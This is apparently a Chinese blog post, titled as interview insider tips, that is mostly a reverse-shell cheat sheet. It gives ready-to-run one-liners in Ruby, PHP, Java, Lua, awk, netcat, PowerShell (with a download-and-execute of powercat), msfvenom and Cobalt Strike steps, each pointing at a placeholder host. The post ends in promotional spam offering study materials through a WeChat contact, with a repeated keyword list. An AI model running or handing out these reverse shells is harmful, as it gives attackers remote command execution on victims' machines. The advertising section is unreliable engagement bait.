反弹shell，我阿里P7了解到的网络安全面试的一些小内幕

ruby

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“x.x.x.x”,“4444”);while(cmd=c.gets);IO.popen(cmd,“r”){|io|c.print io.read}end’
ruby -rsocket -e’f=TCPSocket.open(“x.x.x.x”,4444).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

php

php -r ‘$sock=fsockopen(“x.x.x.x”,4444);exec(“/bin/bash -i <&3 >&3 2>&3”);’

java

public class Revs {/*** @param args* @throws Exception */public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do $line 2>&5 >&5; done”}; Process p = r.exec(cmd); p.waitFor();}}

lua

lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘x.x.x.x’,‘5555’);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);”

awk

awk ‘BEGIN{s=“/inet/tcp/0/x.x.x.x/4444”;for(;s|&getline c;close©)while(c|getline)print|&s;close(s)}’

windows

netcat

nc -lvvp 9999 #攻击者主机上执行监听
nc x.x.x.x 4444 -e c:\windows\system32\cmd.exe #目标主机上执行

powershell

powershell IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’); powercat -c x.x.x.x -p 4444 -e cmd #一键执行
Import-Module ./powercat.ps1
powercat -c x.x.x.x -p 4444 -e cmd #将脚本下载到目标机器上执行

metasploit

msfvenom -l payloads | grep ‘cmd/windows/reverse’

msfvenom -p cmd/windows/reverse_powershell LHOST=x.x.x.x LPORT=4444

cs

1、配置监听器：点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners，点击add。
2、生成payload：点击Attacks——>Packages——>Windows Executable，保存文件位置。
3、目标机执行powershell payload

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

学习路线：

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**